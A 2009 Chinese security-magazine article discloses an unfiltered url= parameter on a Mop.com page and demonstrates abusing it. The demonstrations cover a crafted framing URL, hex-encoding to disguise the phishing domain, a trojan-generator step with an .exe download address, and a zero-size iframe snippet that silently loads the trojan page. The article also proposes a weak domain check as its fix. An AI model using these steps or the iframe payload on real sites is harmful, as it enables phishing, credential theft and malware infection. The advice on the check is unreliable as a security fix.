我代表“猫扑”欺骗你!

安全阵线

赵丰年 王海瑞 苗得雨 · 2009年5月25日 第20期

很受年轻人喜欢的猫扑,有一个存在安全隐患的页面,黑客可以用这个安全隐患进行钓鱼、挂马,以猫扑的名义欺骗你。

如果有一天,你收到一封包含猫扑链接的邮件或者QQ群里面有人发了猫扑链接,你会怀疑吗?如果再确定域名的确是猫扑的,相信很多人都会毫不犹豫地点击。此时,你有可能就陷入了黑客构造的钓鱼网站或者挂马陷阱(图1)。

20-f05-01.jpg

这是怎么回事?原来猫扑网站中的某个页面存在安全隐患(该安全隐患已经通知了猫扑网站),黑客可以利用它进行网络钓鱼或者挂马。如果你上当点击了黑客利用它制造的网页,你就可能被网络骗子蒙骗或者电脑被病毒入侵。

未过滤外部网址

图1其实是一个半真半假的网页,一部分是猫扑的真实页面,另外一部分页面是来自http://xingqibar.cn这个黑客钓鱼网站。之所以会出现这样的问题,主要就是猫扑的http://dzh2.mop.com/ladyClub/indexframe.jsp网页存在外部网址未过滤的情况。

利用这个安全隐患,黑客可以构造http://dzh2.mop.com/ladyClub/indexframe

.jsp?url=http://xingqibar.cn,当用户访问这个网址的时候,indexframe.jsp会获取url=后面的地址,并将http://xingqibar.cn框架套入当前网页中,在特定位置显示出来。

很显然,这是网页设计者在编写这个页面的时候忽略了对url=后面的参数进行过滤,这就如同一个公司虽然安装了大门,却忘记了给门安装门锁一样,其结果是由于没有钥匙的鉴别条件,每个人都能够混入这个公司,冒充公司内部的人员。

通常正常的流程应该是,先获取url=后面的地址,之后判断这个地址是否合法,也就是这个url=后面的链接是不是网站内部的地址,这个可以通过JS脚本判断网址域名前面的字符来确定。

比如dzh2.mop.com,可判断.com前面的字符是否mop,如果是内部合法地址就让其在页面中显示,是外部网址就不在页面中显示,这样黑客就没有了可乘之机。几乎所有给用户造成伤害的网络安全大问题都出在对一个小小的细节的疏忽上。

钓鱼攻击演示

第一步:黑客要先制作一个钓鱼网页。用Dreamweaver或者Microsoft Expression Web完成这个工作(图2),在这个钓鱼页面中使用Request输出函数,就可以保存钓鱼页面中输入的用户名、密码等信息。根据不同的需要,黑客可以制作不同的钓鱼网页,例如中奖钓鱼网页、购物钓鱼网页等。

20-f05-02.jpg

第二步:钓鱼页面制作好后,黑客会将钓鱼页面上传到自己的网站中,然后将钓鱼页面的链接地址添加到http://dzh2.mop.com/ladyClub/indexframe.jsp?url=的后面即可,这样一个伪装成猫扑的钓鱼“陷阱”就做成了。

第三步:高明的黑客还会给地址再加一个伪装,他们会加密钓鱼网址,让你无法看出地址里面接有另外一个地址,增加了迷惑性。黑客一般用的是URL16进制加密,将http://dzh2.mop.com后面的部分全部加密。

登录可以对网址进行加密的网站http://tool.chinaz.com,在网页中找到“代码转换工具”项,然后选择下拉菜单中的“URL16进制加密”项(图3),之后将钓鱼网页链接地址复制到输入栏中进行加密,得到http://dzh2.mop.com/%6C%61%64%79%43%6C%75%62/%69%6E%64%65%78%66%72%61%6D%65%2E%6A%73%70?%75%72%6C=http://%78%69%6E%67%71%69%62%61%72%2E%63%6E。这样伪装后,一般用户就会只注意到http://dzh2.mop.com,而没有想到该网址连接了钓鱼页面。

20-f05-03.jpg

安全小百科:URL16进制加密是将URL中的单个字符转换成16进制,之后每个转换后的16进制字符前面加上%再连在一起就是加密后的地址了。以加密baidu.com为例,baidu.com加密后就是%62%61%69%64%75%2E%63%6F%6D(图4)。

20-f05-04.jpg

挂马攻击演示

除了能用来进行钓鱼攻击之外,这个安全隐患还可以被黑客用来进行挂马攻击,挂马的关键就是制作挂马网页。

第一步:黑客在挂马之前先要准备网页木马,他们通常会使用网页木马生成器,例如使用《MS09-002网页木马生成器》。

打开这款生成器,在“木马下载地址”中输入上传到指定空间的木马地址,例如http://xinbqibar.cn/1.exe(图5),然后点击“生成”按钮,此时生成器会生成一个HTML网页,也就是黑客使用的挂马网页。

20-f05-05.jpg

第二步:将挂马网页上传到空间中,再复制上传后的网页木马链接地址,然后用记事本打开钓鱼页面,在钓鱼页面的HTML代码后面输入IFRAME框架挂马代码“<iframe src=http://网页木马链接地址 width=0 height=0></iframe>”(图6)。这样钓鱼页面就跟挂马页面有关联了,在用户访问钓鱼页面的同时就激活了挂马页面。

20-f05-06.jpg

安全小百科:IFRAME是HTML语言中的框架标签。HTML语言中< iframe >都是成对出现的,代码结束的时候则需要多出一个“ /” 表示代码结束。代码中的width=0表示框架的宽度为0,Height=0表示高度也为0,也就代表这个IFRAME框架既没有高度也没有宽度,那么这个框架就被隐藏了。

第三步:然后将钓鱼页面上传到空间中,再将这个页面地址经过URL16进制加密后添加到“url=”之后,这样一个既能够挂马,又能够钓鱼的页面就制作完成了。

最后黑客会将这样的页面通过QQ群等渠道广为传播。

漏洞修补之法

对猫扑而言,要加强网站的安全性检测,特别是要增加对外部链接地址的过滤,对“url=”后面的外部链接参数过滤要在所有页面进行,不能遗漏一个。

对普通用户而言,要避免被这个漏洞祸害,要有这样的信念,天下没有免费的午餐。例如你在猫扑什么也没做,突然通知你中了一个大奖,这种事基本上是不可能的。大家最好不要相信网络中奖,十有八九都是假的。

如果你看到一个网址后面有大量的加密,就要多一个心眼,最好启动带有网页木马拦截功能的安全辅助工具,再打开网页,避免网页木马的骚扰。此外,大家还要勤打补丁,及时升级杀毒软件病毒库。